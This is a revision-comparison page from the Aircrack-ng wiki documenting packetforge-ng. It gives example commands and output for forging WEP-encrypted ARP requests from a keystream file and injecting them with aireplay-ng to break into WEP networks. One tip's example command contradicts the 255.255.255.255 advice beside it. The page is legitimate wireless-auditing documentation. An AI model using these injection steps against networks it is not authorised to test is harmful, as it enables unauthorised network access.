Aircrack-ng

User Tools

Site Tools

Trace:
packetforge-ng

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Next revision		Previous revision
Next revisionBoth sides next revision
packetforge-ng [2007/01/25 01:24] – created darkaudaxpacketforge-ng [2007/01/27 20:49] – Standardizing the format darkaudax
Line 1: Line 1:
 ====== Packetforge-ng ====== ====== Packetforge-ng ======
 +
 +
  
  
 ===== Description ===== ===== Description =====
-The purpose of packetforge-ng is to create encrypted packets that can subsequently be used for injection.  You may create various types of packets such as arp requests, UDP, ICMP and custom packets.  The most common use is to create arp requests for subsequent injection.+The purpose of packetforge-ng is to create encrypted packets that can subsequently be used for injection. You may create various types of packets such as arp requests, UDP, ICMP and custom packets.  The most common use is to create ARP requests for subsequent injection.
  
-To create an encrypted packet, you must have a PRAGA (pseudo random genration algorithm) file.  This is used to encrypt the packet you create.  This is typically obtained from [[aireplay-ng]] chopchop or fragmentation attacks.+To create an encrypted packet, you must have a PRGA (pseudo random genration algorithm) file. This is used to encrypt the packet you create.  This  is typically obtained from [[aireplay-ng]] [[korek_chopchop|chopchop]] or [[fragmentation]] attacks.
  
 ===== Usage ===== ===== Usage =====
 Usage: packetforge-ng <mode> <options> Usage: packetforge-ng <mode> <options>
  
-  Forge options:+====Forge options:====
  
       *-p <fctrl>     : set frame control word (hex)       *-p <fctrl>     : set frame control word (hex)
Line 24: Line 26:
       *-w <file>      : write packet to this pcap file       *-w <file>      : write packet to this pcap file
  
-  Source options:+====Source options:====
  
       *-r <file>      : read packet from this raw file       *-r <file>      : read packet from this raw file
       *-y <file>      : read PRGA from this file       *-y <file>      : read PRGA from this file
  
-  Modes:+====Modes:====
  
       *--arp          : forge an ARP packet    (-0)       *--arp          : forge an ARP packet    (-0)
Line 35: Line 37:
       *--icmp         : forge an ICMP packet   (-2)       *--icmp         : forge an ICMP packet   (-2)
       *--custom       : build a custom packet  (-9)       *--custom       : build a custom packet  (-9)
 +
 +
  
 ===== Usage Example ===== ===== Usage Example =====
Line 40: Line 44:
 Here is an example of how to generate an arp request packet. Here is an example of how to generate an arp request packet.
  
-First, obtain a xor file (PRAGA) with either the aireplay-ng chopchop or fragmentation method.+First, obtain a xor file (PRGA) with either the aireplay-ng chopchop or fragmentation method.
  
 Then use the following command: Then use the following command:
  
-packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request+  packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request
  
 Where: Where:
Line 50: Line 54:
   *-a 00:14:6C:7E:40:80 is the Access Point MAC address   *-a 00:14:6C:7E:40:80 is the Access Point MAC address
   *-h 00:0F:B5:AB:CB:9D is the source MAC address you wish to use   *-h 00:0F:B5:AB:CB:9D is the source MAC address you wish to use
-  *-k 255.255.255.255 is the destination IP.  IE In an arp it is the "Who has this IP" +  *-k 192.168.1.100 is the destination IP.  IE In an arp it is the "Who has this IP" 
-  *-l 255.255.255.255 is the source IP.  IE In an arp is the "Tells this IP"+  *-l 192.168.1.is the source IP.  IE In an arp it is the "Tell this IP"
   *-y fragment-0124-161129.xor   *-y fragment-0124-161129.xor
   *-w arp-packet   *-w arp-packet
Line 60: Line 64:
  
 The results look like this: The results look like this:
-Total number of packets read             1 +  Total number of packets read             1 
-Total number of WEP data packets         1 +  Total number of WEP data packets         1 
-Total number of WPA data packets         0 +  Total number of WPA data packets         0 
-Number of plaintext data packets         0 +  Number of plaintext data packets         0 
-Number of decrypted WEP  packets         1 +  Number of decrypted WEP  packets         1 
-Number of decrypted WPA  packets         0+  Number of decrypted WPA  packets         0
  
 To view the packet that was just decrypted, enter "tcpdump -n -vvv -e -s0 -r arp-request-dec" To view the packet that was just decrypted, enter "tcpdump -n -vvv -e -s0 -r arp-request-dec"
  
 The results look like this: The results look like this:
-reading from file arp-request-dec, link-type EN10MB (Ethernet) +  reading from file arp-request-dec, link-type EN10MB (Ethernet) 
-18:09:27.743303 00:0f:b5:ab:cb:9d > Broadcast, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.100 tell 192.168.1.1+  18:09:27.743303 00:0f:b5:ab:cb:9d > Broadcast, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.100 tell 192.168.1.1
  
-Which is exactly what we expected.  Now you can inject this arp request packet as follows "aireplay-ng -2 -r arp-request ath0".+Which is exactly what we expected. Now you can inject this arp request packet as follows "aireplay-ng -2 -r arp-request ath0".
  
 The program will respond as follows: The program will respond as follows:
  
         Size: 68, FromDS: 0, ToDS: 1 (WEP)         Size: 68, FromDS: 0, ToDS: 1 (WEP)
 +  
              BSSID  =  00:14:6C:7E:40:80              BSSID  =  00:14:6C:7E:40:80
          Dest. MAC  =  FF:FF:FF:FF:FF:FF          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:0F:B5:AB:CB:9D         Source MAC  =  00:0F:B5:AB:CB:9D
 +  
         0x0000:  0841 0201 0014 6c7e 4080 000f b5ab cb9d  .A....l~@.......         0x0000:  0841 0201 0014 6c7e 4080 000f b5ab cb9d  .A....l~@.......
         0x0010:  ffff ffff ffff 8001 6c48 0000 0999 881a  ........lH......         0x0010:  ffff ffff ffff 8001 6c48 0000 0999 881a  ........lH......
Line 88: Line 92:
         0x0030:  3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1  :.....gC.V$.....         0x0030:  3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1  :.....gC.V$.....
         0x0040:  d64f b709                                .O..         0x0040:  d64f b709                                .O..
 +  
 +  Use this packet ? y
 +  
 +  Saving chosen packet in replay_src-0124-163529.cap
 +  You should also start airodump-ng to capture replies.
 +  End of file.
  
-Use this packet ? y+By entering "y" above, the packet you created with packetforge-ng is then injected.
  
-Saving chosen packet in replay_src-0124-163529.cap 
-You should also start airodump-ng to capture replies. 
  
-End of file.+===== Usage Tips =====
  
-By entering "y" above, the packet you created with packetforge-ng is then injected.+Most access points really don't care what IPs are used for the arp request.  So as a result you can use 255.255.255.255 for source and destination IPs. 
 + 
 +So the packetforge-ng command becomes: 
 +   packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request 
 + 
 +===== Usage Troubleshooting ===== 
 +A common mistake people make is to include either or both -j and -o flags and create invalid packets.  These flags adjust the FromDS and ToDS flages in the packet generated.  Unless you are doing something special and really know what you are doing, don't use them.  In general, they are not needed.
  
packetforge-ng.txt · Last modified: 2010/08/22 20:59 by mister_x